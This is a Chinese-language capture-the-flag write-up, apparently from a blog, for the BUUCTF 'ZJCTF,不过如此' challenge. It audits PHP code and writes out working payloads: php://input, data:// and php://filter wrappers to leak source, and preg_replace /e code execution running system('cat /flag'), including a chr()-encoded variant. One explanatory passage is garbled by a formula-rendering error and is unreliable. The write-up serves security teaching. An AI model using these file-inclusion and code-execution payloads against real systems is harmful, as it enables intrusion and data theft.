不过如此"/>
[BUUCTF][BJDCTF2020]ZJCTF,不过如此
考点
代码审计
命令执行
解题
打开环境
<?phperror_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";if(preg_match("/flag/",$file)){die("Not now!");}include($file); //next.php}
else{highlight_file(__FILE__);
}
?>
首先注释中提示next.php
,我们可以利用php伪协议获取
php://input
text=php://input&file=php://filter/read=convert.base64-encode/resource=next.php
POST:
I have a dream
data://text/plain
text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php
得到源码:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;function complex($re, $str) {return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}foreach($_GET as $re => $str) {echo complex($re, $str). "\n";
}function getFlag(){@eval($_GET['cmd']);
}
审计代码,我们将通过getFlag函数传入cmd参数来进行命令执行
1 preg_replace()的/e模式存在命令执行漏洞
当preg_match函数在匹配到符号正则的字符串时,会将替换字符串当作代码来执行。
题目中已经限定了替换字符是strtolower("\\1")
,而\\1
相当于\1
,该字符在正则匹配中代表第一个子匹配项。
例如:payload为/?.*={${phpinfo()}}
原先的语句: preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
变成了语句: preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});
但是该语句并不能执行phpinfo函数
对于传入的非法的 $_GET 数组参数名,会将其转换成下划线,这就导致我们正则匹配失效,所以我们传入的变量可以为\S*
正则表达式的\S:匹配所有非空白字符;
.号:匹配除\n外的任意字符;
*号:匹配前面的字符0次或者多次
+号:匹配前面的字符1次或者多次(如果要在url里输入+号,必须要对其进行编码,+号编码为:%2b)
最后,为什么要使用 {KaTeX parse error: Expected 'EOF', got '}' at position 12: {phpinfo()}}̲** 或者 **{phpinfo()} ,才能执行 phpinfo 函数呢?这是由于在PHP中双引号包裹的字符串中可以解析变量,而单引号则不行。 p h p i n f o ( ) ∗ ∗ 中 的 ∗ ∗ p h p i n f o ( ) ∗ ∗ 会 被 当 做 变 量 先 执 行 , 执 行 后 , 即 变 成 ∗ ∗ {phpinfo()}** 中的 **phpinfo()** 会被当做变量先执行,执行后,即变成 ** phpinfo()∗∗中的∗∗phpinfo()∗∗会被当做变量先执行,执行后,即变成∗∗{1} (phpinfo()成功执行返回true)。
据此,我们可以构造payload
?\S*=${getFlag()}&cmd=system('cat /flag');
2 用chr拼接system的参数
?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
参考文章:
更多推荐
[BUUCTF][BJDCTF2020]ZJCTF,不过如此
发布评论